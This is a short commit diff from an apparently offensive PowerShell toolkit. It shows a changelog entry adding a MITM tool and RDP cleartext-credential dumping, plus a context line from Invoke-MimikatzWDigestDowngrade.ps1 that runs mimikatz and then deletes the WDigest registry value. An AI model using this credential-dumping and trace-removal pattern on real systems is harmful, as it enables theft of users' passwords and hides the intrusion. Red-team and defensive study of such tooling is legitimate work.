carlvaneijk
diff --git a/‎CHANGELOG.txt
+2 b/‎CHANGELOG.txt
+2
diff --git a/‎Gather/Get-Information 1.ps1
-60 b/‎Gather/Get-Information 1.ps1
-60
diff --git a/‎Gather/Invoke-MimikatzWDigestDowngrade.ps1
+1 b/‎Gather/Invoke-MimikatzWDigestDowngrade.ps1
+1
@@ -1,3 +1,5 @@
+0.6.3
+- Added Invoke-Interceptor to the MITM directory.
 0.6.2
 - Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWfigestDowngrade.
 0.6.1
 
@@ -2841,6 +2841,7 @@ Main
         }
     }
 
+    #Above should work for console login as well but the below code is better and more relaible as it uses WMI events to detect login.
     else
     {
         $actionblock = {& $mimikatz;Sleep 5; Remove-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential }
Original file line number	Diff line number	Diff line change
`@@ -1,3 +1,5 @@`
	`1`	`+0.6.3`
	`2`	`+- Added Invoke-Interceptor to the MITM directory.`
`1`	`3`	`0.6.2`
`2`	`4`	`- Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWfigestDowngrade.`
`3`	`5`	`0.6.1`
Original file line number	Diff line number	Diff line change
`@@ -2841,6 +2841,7 @@ Main`
`2841`	`2841`	`}`
`2842`	`2842`	`}`
`2843`	`2843`
	`2844`	`+ #Above should work for console login as well but the below code is better and more relaible as it uses WMI events to detect login.`
`2844`	`2845`	`else`
`2845`	`2846`	`{`
`2846`	`2847`	`$actionblock = {& $mimikatz;Sleep 5; Remove-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential }`